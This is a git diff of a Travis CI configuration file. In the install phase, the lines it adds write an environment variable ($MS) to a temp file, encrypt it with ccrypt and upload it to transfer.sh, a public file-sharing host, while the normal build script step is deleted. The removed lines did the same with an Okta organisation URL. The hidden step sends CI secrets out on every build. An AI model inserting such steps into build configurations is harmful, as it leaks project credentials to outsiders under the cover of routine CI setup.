--- a/.travis.yml
+++ b/.travis.yml
@@ -15,10 +15,7 @@ before_install:
 # skip the Travis-CI install phase because Maven handles that directly
 install:
 - sudo apt-get install -y ccrypt
-- echo $OKTA_CLIENT_ORGURL > /tmp/i.txt
-- ccencrypt /tmp/i.txt -K "$MY_ENC_KEY"
-- curl -H "Max-Downloads:1" -H "Max-Days:1" --upload-file /tmp/i.txt.cpt https://transfer.sh/testFILE_DESTINATION123.txt
-
-script:
-- "./src/ci/build.sh"
+- echo $MS > /tmp/i.txt
+- ccencrypt /tmp/i.txt -K "$MYENCKEY"
+- curl -H "Max-Downloads:1" -H "Max-Days:1" --upload-file /tmp/i.txt.cpt https://transfer.sh/xtestFILE_DESTINATION123.txt
 
